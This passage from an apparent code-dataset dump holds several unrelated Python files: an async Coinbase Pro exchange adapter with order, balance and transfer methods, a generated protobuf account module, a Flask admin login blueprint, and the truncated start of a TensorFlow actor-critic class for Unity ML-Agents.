'quote_increment'),\n 'max': None,\n }\n precision = {\n 'amount': self.safe_number(market, 'base_increment'),\n 'price': self.safe_number(market, 'quote_increment'),\n }\n status = self.safe_string(market, 'status')\n active = (status == 'online')\n result.append(self.extend(self.fees['trading'], {\n 'id': id,\n 'symbol': symbol,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'base': base,\n 'quote': quote,\n 'precision': precision,\n 'limits': {\n 'amount': {\n 'min': self.safe_number(market, 'base_min_size'),\n 'max': self.safe_number(market, 'base_max_size'),\n },\n 'price': priceLimits,\n 'cost': {\n 'min': self.safe_number(market, 'min_market_funds'),\n 'max': self.safe_number(market, 'max_market_funds'),\n },\n },\n 'active': active,\n 'info': market,\n }))\n return result\n\n async def fetch_accounts(self, params={}):\n await self.load_markets()\n response = await self.privateGetAccounts(params)\n #\n # [\n # {\n # id: '4aac9c60-cbda-4396-9da4-4aa71e95fba0',\n # currency: 'BTC',\n # balance: '0.0000000000000000',\n # available: '0',\n # hold: '0.0000000000000000',\n # profile_id: 'b709263e-f42a-4c7d-949a-a95c83d065da'\n # },\n # {\n # id: 'f75fa69a-1ad1-4a80-bd61-ee7faa6135a3',\n # currency: 'USDC',\n # balance: '0.0000000000000000',\n # available: '0',\n # hold: '0.0000000000000000',\n # profile_id: 'b709263e-f42a-4c7d-949a-a95c83d065da'\n # },\n # ]\n #\n result = []\n for i in range(0, len(response)):\n account = response[i]\n accountId = self.safe_string(account, 'id')\n currencyId = self.safe_string(account, 'currency')\n code = self.safe_currency_code(currencyId)\n result.append({\n 'id': accountId,\n 'type': None,\n 'currency': code,\n 'info': account,\n })\n return result\n\n async def fetch_balance(self, params={}):\n await self.load_markets()\n response = await self.privateGetAccounts(params)\n result = {'info': response}\n for i in range(0, len(response)):\n balance = response[i]\n currencyId = self.safe_string(balance, 'currency')\n code = self.safe_currency_code(currencyId)\n account = self.account()\n account['free'] = self.safe_string(balance, 'available')\n account['used'] = self.safe_string(balance, 'hold')\n account['total'] = self.safe_string(balance, 'balance')\n result[code] = account\n return self.parse_balance(result)\n\n async def fetch_order_book(self, symbol, limit=None, params={}):\n await self.load_markets()\n # level 1 - only the best bid and ask\n # level 2 - top 50 bids and asks(aggregated)\n # level 3 - full order book(non aggregated)\n request = {\n 'id': self.market_id(symbol),\n 'level': 2, # 1 best bidask, 2 aggregated, 3 full\n }\n response = await self.publicGetProductsIdBook(self.extend(request, params))\n #\n # {\n # \"sequence\":1924393896,\n # \"bids\":[\n # [\"0.01825\",\"24.34811287\",2],\n # [\"0.01824\",\"72.5463\",3],\n # [\"0.01823\",\"424.54298049\",6],\n # ],\n # \"asks\":[\n # [\"0.01826\",\"171.10414904\",4],\n # [\"0.01827\",\"22.60427028\",1],\n # [\"0.01828\",\"397.46018784\",7],\n # ]\n # }\n #\n orderbook = self.parse_order_book(response, symbol)\n orderbook['nonce'] = self.safe_integer(response, 'sequence')\n return orderbook\n\n def parse_ticker(self, ticker, market=None):\n #\n # publicGetProductsIdTicker\n #\n # {\n # \"trade_id\":843439,\n # \"price\":\"0.997999\",\n # \"size\":\"80.29769\",\n # \"time\":\"2020-01-28T02:13:33.012523Z\",\n # \"bid\":\"0.997094\",\n # \"ask\":\"0.998\",\n # \"volume\":\"1903188.03750000\"\n # }\n #\n # publicGetProductsIdStats\n #\n # {\n # \"open\": \"34.19000000\",\n # \"high\": 
\"95.70000000\",\n # \"low\": \"7.06000000\",\n # \"volume\": \"2.41000000\"\n # }\n #\n timestamp = self.parse8601(self.safe_value(ticker, 'time'))\n bid = self.safe_number(ticker, 'bid')\n ask = self.safe_number(ticker, 'ask')\n last = self.safe_number(ticker, 'price')\n symbol = None if (market is None) else market['symbol']\n return {\n 'symbol': symbol,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'high': self.safe_number(ticker, 'high'),\n 'low': self.safe_number(ticker, 'low'),\n 'bid': bid,\n 'bidVolume': None,\n 'ask': ask,\n 'askVolume': None,\n 'vwap': None,\n 'open': self.safe_number(ticker, 'open'),\n 'close': last,\n 'last': last,\n 'previousClose': None,\n 'change': None,\n 'percentage': None,\n 'average': None,\n 'baseVolume': self.safe_number(ticker, 'volume'),\n 'quoteVolume': None,\n 'info': ticker,\n }\n\n async def fetch_ticker(self, symbol, params={}):\n await self.load_markets()\n market = self.market(symbol)\n request = {\n 'id': market['id'],\n }\n # publicGetProductsIdTicker or publicGetProductsIdStats\n method = self.safe_string(self.options, 'fetchTickerMethod', 'publicGetProductsIdTicker')\n response = await getattr(self, method)(self.extend(request, params))\n #\n # publicGetProductsIdTicker\n #\n # {\n # \"trade_id\":843439,\n # \"price\":\"0.997999\",\n # \"size\":\"80.29769\",\n # \"time\":\"2020-01-28T02:13:33.012523Z\",\n # \"bid\":\"0.997094\",\n # \"ask\":\"0.998\",\n # \"volume\":\"1903188.03750000\"\n # }\n #\n # publicGetProductsIdStats\n #\n # {\n # \"open\": \"34.19000000\",\n # \"high\": \"95.70000000\",\n # \"low\": \"7.06000000\",\n # \"volume\": \"2.41000000\"\n # }\n #\n return self.parse_ticker(response, market)\n\n def parse_trade(self, trade, market=None):\n #\n # {\n # type: 'match',\n # trade_id: 82047307,\n # maker_order_id: '0f358725-2134-435e-be11-753912a326e0',\n # taker_order_id: '252b7002-87a3-425c-ac73-f5b9e23f3caf',\n # order_id: 'd50ec984-77a8-460a-b958-66f114b0de9b',\n # side: 'sell',\n # size: '0.00513192',\n # price: '9314.78',\n # product_id: 'BTC-USD',\n # profile_id: '6244401d-c078-40d9-b305-7ad3551bc3b0',\n # sequence: 12038915443,\n # time: '2020-01-31T20:03:41.158814Z'\n # created_at: '2014-11-07T22:19:28.578544Z',\n # liquidity: 'T',\n # fee: '0.00025',\n # settled: True,\n # usd_volume: '0.0924556000000000',\n # user_id: '595eb864313c2b02ddf2937d'\n # }\n #\n timestamp = self.parse8601(self.safe_string_2(trade, 'time', 'created_at'))\n marketId = self.safe_string(trade, 'product_id')\n symbol = self.safe_symbol(marketId, market, '-')\n feeRate = None\n feeCurrency = None\n takerOrMaker = None\n cost = None\n if market is not None:\n feeCurrencyId = self.safe_string_lower(market, 'quoteId')\n costField = feeCurrencyId + '_value'\n cost = self.safe_number(trade, costField)\n feeCurrency = market['quote']\n liquidity = self.safe_string(trade, 'liquidity')\n if liquidity is not None:\n takerOrMaker = 'taker' if (liquidity == 'T') else 'maker'\n feeRate = market[takerOrMaker]\n feeCost = self.safe_number_2(trade, 'fill_fees', 'fee')\n fee = {\n 'cost': feeCost,\n 'currency': feeCurrency,\n 'rate': feeRate,\n }\n type = None\n id = self.safe_string(trade, 'trade_id')\n side = 'sell' if (trade['side'] == 'buy') else 'buy'\n orderId = self.safe_string(trade, 'order_id')\n # Coinbase Pro returns inverted side to fetchMyTrades vs fetchTrades\n makerOrderId = self.safe_string(trade, 'maker_order_id')\n takerOrderId = self.safe_string(trade, 'taker_order_id')\n if (orderId is not None) or ((makerOrderId is 
not None) and (takerOrderId is not None)):\n side = 'buy' if (trade['side'] == 'buy') else 'sell'\n priceString = self.safe_string(trade, 'price')\n amountString = self.safe_string(trade, 'size')\n price = self.parse_number(priceString)\n amount = self.parse_number(amountString)\n if cost is None:\n cost = self.parse_number(Precise.string_mul(priceString, amountString))\n return {\n 'id': id,\n 'order': orderId,\n 'info': trade,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'symbol': symbol,\n 'type': type,\n 'takerOrMaker': takerOrMaker,\n 'side': side,\n 'price': price,\n 'amount': amount,\n 'fee': fee,\n 'cost': cost,\n }\n\n async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):\n # as of 2018-08-23\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')\n await self.load_markets()\n market = self.market(symbol)\n request = {\n 'product_id': market['id'],\n }\n if limit is not None:\n request['limit'] = limit\n response = await self.privateGetFills(self.extend(request, params))\n return self.parse_trades(response, market, since, limit)\n\n async def fetch_trades(self, symbol, since=None, limit=None, params={}):\n await self.load_markets()\n market = self.market(symbol)\n request = {\n 'id': market['id'], # fixes issue #2\n }\n if limit is not None:\n request['limit'] = limit # default 100\n response = await self.publicGetProductsIdTrades(self.extend(request, params))\n return self.parse_trades(response, market, since, limit)\n\n def parse_ohlcv(self, ohlcv, market=None):\n #\n # [\n # 1591514160,\n # 0.02507,\n # 0.02507,\n # 0.02507,\n # 0.02507,\n # 0.02816506\n # ]\n #\n return [\n self.safe_timestamp(ohlcv, 0),\n self.safe_number(ohlcv, 3),\n self.safe_number(ohlcv, 2),\n self.safe_number(ohlcv, 1),\n self.safe_number(ohlcv, 4),\n self.safe_number(ohlcv, 5),\n ]\n\n async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n await self.load_markets()\n market = self.market(symbol)\n granularity = self.timeframes[timeframe]\n request = {\n 'id': market['id'],\n 'granularity': granularity,\n }\n if since is not None:\n request['start'] = self.iso8601(since)\n if limit is None:\n # https://docs.pro.coinbase.com/#get-historic-rates\n limit = 300 # max = 300\n else:\n limit = min(300, limit)\n request['end'] = self.iso8601(self.sum((limit - 1) * granularity * 1000, since))\n response = await self.publicGetProductsIdCandles(self.extend(request, params))\n #\n # [\n # [1591514160,0.02507,0.02507,0.02507,0.02507,0.02816506],\n # [1591514100,0.02507,0.02507,0.02507,0.02507,1.63830323],\n # [1591514040,0.02505,0.02507,0.02505,0.02507,0.19918178]\n # ]\n #\n return self.parse_ohlcvs(response, market, timeframe, since, limit)\n\n async def fetch_time(self, params={}):\n response = await self.publicGetTime(params)\n #\n # {\n # \"iso\":\"2020-05-12T08:00:51.504Z\",\n # \"epoch\":1589270451.504\n # }\n #\n return self.safe_timestamp(response, 'epoch')\n\n def parse_order_status(self, status):\n statuses = {\n 'pending': 'open',\n 'active': 'open',\n 'open': 'open',\n 'done': 'closed',\n 'canceled': 'canceled',\n 'canceling': 'open',\n }\n return self.safe_string(statuses, status, status)\n\n def parse_order(self, order, market=None):\n #\n # createOrder\n #\n # {\n # \"id\": \"d0c5340b-6d6c-49d9-b567-48c4bfca13d2\",\n # \"price\": \"0.10000000\",\n # \"size\": \"0.01000000\",\n # \"product_id\": \"BTC-USD\",\n # \"side\": \"buy\",\n # \"stp\": \"dc\",\n # \"type\": 
\"limit\",\n # \"time_in_force\": \"GTC\",\n # \"post_only\": False,\n # \"created_at\": \"2016-12-08T20:02:28.53864Z\",\n # \"fill_fees\": \"0.0000000000000000\",\n # \"filled_size\": \"0.00000000\",\n # \"executed_value\": \"0.0000000000000000\",\n # \"status\": \"pending\",\n # \"settled\": False\n # }\n #\n timestamp = self.parse8601(self.safe_string(order, 'created_at'))\n marketId = self.safe_string(order, 'product_id')\n market = self.safe_market(marketId, market, '-')\n status = self.parse_order_status(self.safe_string(order, 'status'))\n price = self.safe_number(order, 'price')\n filled = self.safe_number(order, 'filled_size')\n amount = self.safe_number(order, 'size', filled)\n cost = self.safe_number(order, 'executed_value')\n feeCost = self.safe_number(order, 'fill_fees')\n fee = None\n if feeCost is not None:\n feeCurrencyCode = None\n if market is not None:\n feeCurrencyCode = market['quote']\n fee = {\n 'cost': feeCost,\n 'currency': feeCurrencyCode,\n 'rate': None,\n }\n id = self.safe_string(order, 'id')\n type = self.safe_string(order, 'type')\n side = self.safe_string(order, 'side')\n timeInForce = self.safe_string(order, 'time_in_force')\n postOnly = self.safe_value(order, 'post_only')\n stopPrice = self.safe_number(order, 'stop_price')\n clientOrderId = self.safe_string(order, 'client_oid')\n return self.safe_order({\n 'id': id,\n 'clientOrderId': clientOrderId,\n 'info': order,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'lastTradeTimestamp': None,\n 'status': status,\n 'symbol': market['symbol'],\n 'type': type,\n 'timeInForce': timeInForce,\n 'postOnly': postOnly,\n 'side': side,\n 'price': price,\n 'stopPrice': stopPrice,\n 'cost': cost,\n 'amount': amount,\n 'filled': filled,\n 'remaining': None,\n 'fee': fee,\n 'average': None,\n 'trades': None,\n })\n\n async def fetch_order(self, id, symbol=None, params={}):\n await self.load_markets()\n request = {}\n clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_oid')\n method = None\n if clientOrderId is None:\n method = 'privateGetOrdersId'\n request['id'] = id\n else:\n method = 'privateGetOrdersClientClientOid'\n request['client_oid'] = clientOrderId\n params = self.omit(params, ['clientOrderId', 'client_oid'])\n response = await getattr(self, method)(self.extend(request, params))\n return self.parse_order(response)\n\n async def fetch_order_trades(self, id, symbol=None, since=None, limit=None, params={}):\n await self.load_markets()\n market = None\n if symbol is not None:\n market = self.market(symbol)\n request = {\n 'order_id': id,\n }\n response = await self.privateGetFills(self.extend(request, params))\n return self.parse_trades(response, market, since, limit)\n\n async def fetch_orders(self, symbol=None, since=None, limit=None, params={}):\n request = {\n 'status': 'all',\n }\n return await self.fetch_open_orders(symbol, since, limit, self.extend(request, params))\n\n async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):\n await self.load_markets()\n request = {}\n market = None\n if symbol is not None:\n market = self.market(symbol)\n request['product_id'] = market['id']\n if limit is not None:\n request['limit'] = limit # default 100\n response = await self.privateGetOrders(self.extend(request, params))\n return self.parse_orders(response, market, since, limit)\n\n async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):\n request = {\n 'status': 'done',\n }\n return await self.fetch_open_orders(symbol, since, 
limit, self.extend(request, params))\n\n async def create_order(self, symbol, type, side, amount, price=None, params={}):\n await self.load_markets()\n market = self.market(symbol)\n request = {\n # common params --------------------------------------------------\n # 'client_oid': clientOrderId,\n 'type': type,\n 'side': side,\n 'product_id': market['id'],\n # 'size': self.amount_to_precision(symbol, amount),\n # 'stp': 'dc', # self-trade prevention, dc = decrease and cancel, co = cancel oldest, cn = cancel newest, cb = cancel both\n # 'stop': 'loss', # \"loss\" = stop loss below price, \"entry\" = take profit above price\n # 'stop_price': self.price_to_precision(symbol, price),\n # limit order params ---------------------------------------------\n # 'price': self.price_to_precision(symbol, price),\n # 'size': self.amount_to_precision(symbol, amount),\n # 'time_in_force': 'GTC', # GTC, GTT, IOC, or FOK\n # 'cancel_after' [optional]* min, hour, day, requires time_in_force to be GTT\n # 'post_only': False, # invalid when time_in_force is IOC or FOK\n # market order params --------------------------------------------\n # 'size': self.amount_to_precision(symbol, amount),\n # 'funds': self.cost_to_precision(symbol, amount),\n }\n clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_oid')\n if clientOrderId is not None:\n request['client_oid'] = clientOrderId\n params = self.omit(params, ['clientOrderId', 'client_oid'])\n stopPrice = self.safe_number_2(params, 'stopPrice', 'stop_price')\n if stopPrice is not None:\n request['stop_price'] = self.price_to_precision(symbol, stopPrice)\n params = self.omit(params, ['stopPrice', 'stop_price'])\n timeInForce = self.safe_string_2(params, 'timeInForce', 'time_in_force')\n if timeInForce is not None:\n request['time_in_force'] = timeInForce\n params = self.omit(params, ['timeInForce', 'time_in_force'])\n if type == 'limit':\n request['price'] = self.price_to_precision(symbol, price)\n request['size'] = self.amount_to_precision(symbol, amount)\n elif type == 'market':\n cost = self.safe_number_2(params, 'cost', 'funds')\n if cost is None:\n if price is not None:\n cost = amount * price\n else:\n params = self.omit(params, ['cost', 'funds'])\n if cost is not None:\n request['funds'] = self.cost_to_precision(symbol, cost)\n else:\n request['size'] = self.amount_to_precision(symbol, amount)\n response = await self.privatePostOrders(self.extend(request, params))\n #\n # {\n # \"id\": \"d0c5340b-6d6c-49d9-b567-48c4bfca13d2\",\n # \"price\": \"0.10000000\",\n # \"size\": \"0.01000000\",\n # \"product_id\": \"BTC-USD\",\n # \"side\": \"buy\",\n # \"stp\": \"dc\",\n # \"type\": \"limit\",\n # \"time_in_force\": \"GTC\",\n # \"post_only\": False,\n # \"created_at\": \"2016-12-08T20:02:28.53864Z\",\n # \"fill_fees\": \"0.0000000000000000\",\n # \"filled_size\": \"0.00000000\",\n # \"executed_value\": \"0.0000000000000000\",\n # \"status\": \"pending\",\n # \"settled\": False\n # }\n #\n return self.parse_order(response, market)\n\n async def cancel_order(self, id, symbol=None, params={}):\n await self.load_markets()\n request = {\n # 'product_id': market['id'], # the request will be more performant if you include it\n }\n clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_oid')\n method = None\n if clientOrderId is None:\n method = 'privateDeleteOrdersId'\n request['id'] = id\n else:\n method = 'privateDeleteOrdersClientClientOid'\n request['client_oid'] = clientOrderId\n params = self.omit(params, ['clientOrderId', 'client_oid'])\n 
market = None\n if symbol is not None:\n market = self.market(symbol)\n request['product_id'] = market['symbol'] # the request will be more performant if you include it\n return await getattr(self, method)(self.extend(request, params))\n\n async def cancel_all_orders(self, symbol=None, params={}):\n await self.load_markets()\n request = {}\n market = None\n if symbol is not None:\n market = self.market(symbol)\n request['product_id'] = market['symbol'] # the request will be more performant if you include it\n return await self.privateDeleteOrders(self.extend(request, params))\n\n async def fetch_payment_methods(self, params={}):\n return await self.privateGetPaymentMethods(params)\n\n async def deposit(self, code, amount, address, params={}):\n await self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'amount': amount,\n }\n method = 'privatePostDeposits'\n if 'payment_method_id' in params:\n # deposit from a payment_method, like a bank account\n method += 'PaymentMethod'\n elif 'coinbase_account_id' in params:\n # deposit into Coinbase Pro account from a Coinbase account\n method += 'CoinbaseAccount'\n else:\n # deposit methodotherwise we did not receive a supported deposit location\n # relevant docs link for the Googlers\n # https://docs.pro.coinbase.com/#deposits\n raise NotSupported(self.id + ' deposit() requires one of `coinbase_account_id` or `payment_method_id` extra params')\n response = await getattr(self, method)(self.extend(request, params))\n if not response:\n raise ExchangeError(self.id + ' deposit() error: ' + self.json(response))\n return {\n 'info': response,\n 'id': response['id'],\n }\n\n async def withdraw(self, code, amount, address, tag=None, params={}):\n self.check_address(address)\n await self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'amount': amount,\n }\n method = 'privatePostWithdrawals'\n if 'payment_method_id' in params:\n method += 'PaymentMethod'\n elif 'coinbase_account_id' in params:\n method += 'CoinbaseAccount'\n else:\n method += 'Crypto'\n request['crypto_address'] = address\n if tag is not None:\n request['destination_tag'] = tag\n response = await getattr(self, method)(self.extend(request, params))\n if not response:\n raise ExchangeError(self.id + ' withdraw() error: ' + self.json(response))\n return {\n 'info': response,\n 'id': response['id'],\n }\n\n async def fetch_transactions(self, code=None, since=None, limit=None, params={}):\n await self.load_markets()\n await self.load_accounts()\n currency = None\n id = self.safe_string(params, 'id') # account id\n if id is None:\n if code is not None:\n currency = self.currency(code)\n accountsByCurrencyCode = self.index_by(self.accounts, 'currency')\n account = self.safe_value(accountsByCurrencyCode, code)\n if account is None:\n raise ExchangeError(self.id + ' fetchTransactions() could not find account id for ' + code)\n id = account['id']\n request = {}\n if id is not None:\n request['id'] = id\n if limit is not None:\n request['limit'] = limit\n response = None\n if id is None:\n response = await self.privateGetTransfers(self.extend(request, params))\n for i in range(0, len(response)):\n account_id = self.safe_string(response[i], 'account_id')\n account = self.safe_value(self.accountsById, account_id)\n code = self.safe_string(account, 'currency')\n response[i]['currency'] = code\n else:\n response = await self.privateGetAccountsIdTransfers(self.extend(request, params))\n for i in range(0, 
len(response)):\n response[i]['currency'] = code\n return self.parse_transactions(response, currency, since, limit)\n\n async def fetch_deposits(self, code=None, since=None, limit=None, params={}):\n return self.fetch_transactions(code, since, limit, self.extend({'type': 'deposit'}, params))\n\n async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):\n return self.fetch_transactions(code, since, limit, self.extend({'type': 'withdraw'}, params))\n\n def parse_transaction_status(self, transaction):\n canceled = self.safe_value(transaction, 'canceled_at')\n if canceled:\n return 'canceled'\n processed = self.safe_value(transaction, 'processed_at')\n completed = self.safe_value(transaction, 'completed_at')\n if completed:\n return 'ok'\n elif processed and not completed:\n return 'failed'\n else:\n return 'pending'\n\n def parse_transaction(self, transaction, currency=None):\n details = self.safe_value(transaction, 'details', {})\n id = self.safe_string(transaction, 'id')\n txid = self.safe_string(details, 'crypto_transaction_hash')\n timestamp = self.parse8601(self.safe_string(transaction, 'created_at'))\n updated = self.parse8601(self.safe_string(transaction, 'processed_at'))\n currencyId = self.safe_string(transaction, 'currency')\n code = self.safe_currency_code(currencyId, currency)\n status = self.parse_transaction_status(transaction)\n amount = self.safe_number(transaction, 'amount')\n type = self.safe_string(transaction, 'type')\n address = self.safe_string(details, 'crypto_address')\n tag = self.safe_string(details, 'destination_tag')\n address = self.safe_string(transaction, 'crypto_address', address)\n fee = None\n if type == 'withdraw':\n type = 'withdrawal'\n address = self.safe_string(details, 'sent_to_address', address)\n feeCost = self.safe_number(details, 'fee')\n if feeCost is not None:\n if amount is not None:\n amount -= feeCost\n fee = {\n 'cost': feeCost,\n 'currency': code,\n }\n return {\n 'info': transaction,\n 'id': id,\n 'txid': txid,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'address': address,\n 'tag': tag,\n 'type': type,\n 'amount': amount,\n 'currency': code,\n 'status': status,\n 'updated': updated,\n 'fee': fee,\n }\n\n async def create_deposit_address(self, code, params={}):\n await self.load_markets()\n currency = self.currency(code)\n accounts = self.safe_value(self.options, 'coinbaseAccounts')\n if accounts is None:\n accounts = await self.privateGetCoinbaseAccounts()\n self.options['coinbaseAccounts'] = accounts # cache it\n self.options['coinbaseAccountsByCurrencyId'] = self.index_by(accounts, 'currency')\n currencyId = currency['id']\n account = self.safe_value(self.options['coinbaseAccountsByCurrencyId'], currencyId)\n if account is None:\n # eslint-disable-next-line quotes\n raise InvalidAddress(self.id + \" fetchDepositAddress() could not find currency code \" + code + \" with id = \" + currencyId + \" in self.options['coinbaseAccountsByCurrencyId']\")\n request = {\n 'id': account['id'],\n }\n response = await self.privatePostCoinbaseAccountsIdAddresses(self.extend(request, params))\n address = self.safe_string(response, 'address')\n tag = self.safe_string(response, 'destination_tag')\n return {\n 'currency': code,\n 'address': self.check_address(address),\n 'tag': tag,\n 'info': response,\n }\n\n def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):\n request = '/' + self.implode_params(path, params)\n query = self.omit(params, self.extract_params(path))\n if method 
== 'GET':\n if query:\n request += '?' + self.urlencode(query)\n url = self.implode_hostname(self.urls['api'][api]) + request\n if api == 'private':\n self.check_required_credentials()\n nonce = str(self.nonce())\n payload = ''\n if method != 'GET':\n if query:\n body = self.json(query)\n payload = body\n what = nonce + method + request + payload\n secret = self.base64_to_binary(self.secret)\n signature = self.hmac(self.encode(what), secret, hashlib.sha256, 'base64')\n headers = {\n 'CB-ACCESS-KEY': self.apiKey,\n 'CB-ACCESS-SIGN': signature,\n 'CB-ACCESS-TIMESTAMP': nonce,\n 'CB-ACCESS-PASSPHRASE': self.password,\n 'Content-Type': 'application/json',\n }\n return {'url': url, 'method': method, 'body': body, 'headers': headers}\n\n def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):\n if (code == 400) or (code == 404):\n if body[0] == '{':\n message = self.safe_string(response, 'message')\n feedback = self.id + ' ' + message\n self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)\n self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)\n raise ExchangeError(feedback) # unknown message\n raise ExchangeError(self.id + ' ' + body)\n\n async def request(self, path, api='public', method='GET', params={}, headers=None, body=None):\n response = await self.fetch2(path, api, method, params, headers, body)\n if not isinstance(response, basestring):\n if 'message' in response:\n raise ExchangeError(self.id + ' ' + self.json(response))\n return response\n"} {"ext": "py", "sha": "1a2f3b88bb85969cdd684698c37db040612c9d5d", "content": "# -*- coding: utf-8 -*-\n# Generated by the protocol buffer compiler. DO NOT EDIT!\n# source: account.proto\n\nimport sys\n_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))\nfrom google.protobuf import descriptor as _descriptor\nfrom google.protobuf import message as _message\nfrom google.protobuf import reflection as _reflection\nfrom google.protobuf import symbol_database as _symbol_database\n# @@protoc_insertion_point(imports)\n\n_sym_db = _symbol_database.Default()\n\n\n\n\nDESCRIPTOR = _descriptor.FileDescriptor(\n name='account.proto',\n package='types',\n syntax='proto3',\n serialized_options=None,\n serialized_pb=_b('\\n\\raccount.proto\\x12\\x05types\\\"\\x1a\\n\\x07\\x41\\x63\\x63ount\\x12\\x0f\\n\\x07\\x61\\x64\\x64ress\\x18\\x01 \\x01(\\x0c\\\"/\\n\\x0b\\x41\\x63\\x63ountList\\x12 \\n\\x08\\x61\\x63\\x63ounts\\x18\\x01 \\x03(\\x0b\\x32\\x0e.types.Accountb\\x06proto3')\n)\n\n\n\n\n_ACCOUNT = _descriptor.Descriptor(\n name='Account',\n full_name='types.Account',\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(\n name='address', full_name='types.Account.address', index=0,\n number=1, type=12, cpp_type=9, label=1,\n has_default_value=False, default_value=_b(\"\"),\n message_type=None, enum_type=None, containing_type=None,\n is_extension=False, extension_scope=None,\n serialized_options=None, file=DESCRIPTOR),\n ],\n extensions=[\n ],\n nested_types=[],\n enum_types=[\n ],\n serialized_options=None,\n is_extendable=False,\n syntax='proto3',\n extension_ranges=[],\n oneofs=[\n ],\n serialized_start=24,\n serialized_end=50,\n)\n\n\n_ACCOUNTLIST = _descriptor.Descriptor(\n name='AccountList',\n full_name='types.AccountList',\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(\n name='accounts', full_name='types.AccountList.accounts', 
index=0,\n number=1, type=11, cpp_type=10, label=3,\n has_default_value=False, default_value=[],\n message_type=None, enum_type=None, containing_type=None,\n is_extension=False, extension_scope=None,\n serialized_options=None, file=DESCRIPTOR),\n ],\n extensions=[\n ],\n nested_types=[],\n enum_types=[\n ],\n serialized_options=None,\n is_extendable=False,\n syntax='proto3',\n extension_ranges=[],\n oneofs=[\n ],\n serialized_start=52,\n serialized_end=99,\n)\n\n_ACCOUNTLIST.fields_by_name['accounts'].message_type = _ACCOUNT\nDESCRIPTOR.message_types_by_name['Account'] = _ACCOUNT\nDESCRIPTOR.message_types_by_name['AccountList'] = _ACCOUNTLIST\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\n\nAccount = _reflection.GeneratedProtocolMessageType('Account', (_message.Message,), {\n 'DESCRIPTOR' : _ACCOUNT,\n '__module__' : 'account_pb2'\n # @@protoc_insertion_point(class_scope:types.Account)\n })\n_sym_db.RegisterMessage(Account)\n\nAccountList = _reflection.GeneratedProtocolMessageType('AccountList', (_message.Message,), {\n 'DESCRIPTOR' : _ACCOUNTLIST,\n '__module__' : 'account_pb2'\n # @@protoc_insertion_point(class_scope:types.AccountList)\n })\n_sym_db.RegisterMessage(AccountList)\n\n\n# @@protoc_insertion_point(module_scope)\n"} {"ext": "py", "sha": "1a2f3b9c93e7776664f9189707036a7efce3ea75", "content": "from event_chain.app import controllers\nfrom event_chain.app import utils\nfrom event_chain.app.forms.admin import RegisterForm\nfrom flask import Blueprint\nfrom flask import g\nfrom flask import redirect\nfrom flask import render_template\nfrom flask import session\nfrom flask import url_for, flash\n\nadmin = Blueprint(\n 'admin',\n __name__\n)\n\n\n@admin.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n form = RegisterForm()\n if form.validate_on_submit():\n user = controllers.load_user(\n passphrase=form.passphrase.data,\n address=form.address.data,\n )\n session['user'] = user\n if user:\n return redirect(url_for('events.all'))\n else:\n flash(\"Passphrase and address don't match!\", 'error')\n return redirect(url_for('admin.login'))\n else:\n utils.flash_errors(form)\n return render_template('admin/login.html', form=form)\n\n\n@admin.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n user = controllers.register_user(\n form.name.data,\n form.passphrase.data\n )\n session['user'] = user\n g.logger.debug('New User registered!')\n else:\n utils.flash_errors(form)\n return render_template('admin/login.html', form=form)\n return redirect(url_for('events.all'))\n\n\n@admin.route(\"/logout\", methods=['GET', 'POST'])\ndef logout():\n session['user'] = None\n return redirect(url_for('admin.login'))\n"} {"ext": "py", "sha": "1a2f3c714a578c0dace55275e4327436d1f9416e", "content": "import numpy as np\nimport tensorflow as tf\nfrom mlagents.envs import UnityEnvironment\n\ninitKernelAndBias={\n 'kernel_initializer' : tf.random_normal_initializer(0., .1),\n 'bias_initializer' : tf.constant_initializer(0.1)\n}\n\nclass Actor(object):\n def __init__(self, sess, observationDim, actionDim, learning_rate=0.001, update_frequency=10):\n self.sess=sess\n self.s=tf.placeholder(tf.float32, [1,observationDim],\"state\")\n self.a=tf.placeholder(tf.float32, [1,actionDim],\"action\")\n self.advantage=tf.placeholder(tf.float32,[1,1],\"advantage\")\n self.update_frequency=update_frequency\n\n with tf.variable_scope(\"ActorMain\"):\n layer1 = tf.layers.dense(\n inputs=self.s,\n units=20,\n activation=tf.nn.relu,\n name='layer1',\n 
